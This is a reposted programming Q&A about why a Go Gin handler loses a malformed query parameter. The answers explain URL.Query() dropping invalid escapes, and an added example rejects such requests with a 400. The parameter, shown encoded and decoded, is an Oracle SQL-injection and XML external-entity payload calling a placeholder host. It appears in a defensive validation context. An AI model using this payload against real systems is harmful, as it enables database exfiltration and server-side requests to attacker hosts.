Missing query parameter in request

Question

Running the following Go code:

package main

import (
	"fmt"
	"github.com/gin-gonic/gin"
)

func main() {
	r := gin.Default()
	r.GET("/", func(c *gin.Context) {
		qParam, ok := c.GetQuery("fromDate") // qParam is nil
		query := c.Request.URL.Query() // query is empty
		rawQuery := c.Request.URL.RawQuery // contains the parameter
		fmt.Println(qParam, ok, query, rawQuery)
		c.JSON(200, gin.H{
			"message": "pong",
		})
	})
	r.Run("localhost:8181")
}

With the following query parameter, golang seems to not be returning it:

fromDate=%7bbase%7d%7c%7cextractvalue(xmltype('%3c!DOCTYPE%20root%20[%3c!ENTITY%20%%20xxx%20SYSTEM%20%7bbase%7d%22http%3a%2f%2f%7bdomain%7d%2fext1%22%3e%xxx%3b]%3e'),'%2fl')

Although it is present in the URL.RawQuery:
debug screenshot

I need to access this value so I can validate it and return an error code, but as it is returned as nil I cannot do that.

Answer 1

Score: 1

Gin c.Query() and URL.Query() are the same:

> Query returns the keyed url query value if it exists, otherwise it returns an empty string (""). It is shortcut for c.Request.URL.Query().Get(key)

And URL.Query() silently discards invalid params.

The query param you showed above is invalid. You should properly escape the original string before calling the server endpoint.

If this is not under your control, you may just be out of luck. You could attempt fixing the raw param, but that is arbitrary and not scalable.

For the record, this is what your original query string might look like:

{base}||extractvalue(xmltype('<!DOCTYPE root [<!ENTITY  xxx SYSTEM {base}"http://{domain}/ext1"> xxx;]>'),'/l')

Answer 2

Score: 1

If your original query string is:

fromDate={base}||extractvalue(xmltype('<!DOCTYPE root [<!ENTITY % xxx SYSTEM {base}"http://{domain}/ext1">%xxx;]>'),'/l')

then you should encode the query like this (I don't think it is a good way):

fromDate=%7bbase%7d%7c%7cextractvalue(xmltype(%27%3C!DOCTYPE%20root%20[%3C!ENTITY%20%25%20xxx%20SYSTEM%20%7bbase%7d%22http%3a%2f%2f%7bdomain%7d%2fext1%22%3E%25xxx%3b]%3E%27),%27%2fl%27)

because the '%' in your original string was encoded as '%' not '%25' so the '%%' would be parsed with error.
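
An added example, not part of the original answers: `url.ParseQuery` returns the decode error that `URL.Query()` discards, so a handler can reject a malformed query string with a 400 instead of seeing an empty value. It uses only the standard library; `lenientGet`, `strictQuery`, `handler` and `statusFor` are illustrative names, the query strings are constructed samples, and the Gin equivalent is assumed to read `c.Request.URL.RawQuery`.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"net/url"
)

// lenientGet mirrors c.Query(key): URL.Query() drops pairs that fail to decode.
func lenientGet(rawQuery, key string) string {
	u := url.URL{RawQuery: rawQuery}
	return u.Query().Get(key)
}

// strictQuery returns the decode error that URL.Query() throws away.
func strictQuery(rawQuery string) (url.Values, error) {
	return url.ParseQuery(rawQuery)
}

// handler answers 400 when the query string is malformed or fromDate is absent.
// Assumption: in Gin the same check would read c.Request.URL.RawQuery.
func handler(w http.ResponseWriter, r *http.Request) {
	values, err := strictQuery(r.URL.RawQuery)
	if err != nil {
		http.Error(w, "malformed query string", http.StatusBadRequest)
		return
	}
	if _, ok := values["fromDate"]; !ok {
		http.Error(w, "fromDate is required", http.StatusBadRequest)
		return
	}
	fmt.Fprintln(w, "pong")
}

// statusFor runs one GET with the given raw query through handler.
func statusFor(rawQuery string) int {
	rec := httptest.NewRecorder()
	handler(rec, httptest.NewRequest(http.MethodGet, "/?"+rawQuery, nil))
	return rec.Code
}

func main() {
	// Constructed samples: a bare '%' as in the question, then the '%25' form.
	for _, q := range []string{"fromDate=a%20%%20xxx", "fromDate=a%20%25%20xxx"} {
		_, err := strictQuery(q)
		fmt.Printf("%s lenient=%q err=%v status=%d\n", q, lenientGet(q, "fromDate"), err, statusFor(q))
	}
}
```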

huangapple
  • Published on September 16, 2021, 17:35:55
  • When reposting, please keep the link to this article: https://go.coder-hub.com/69205940.html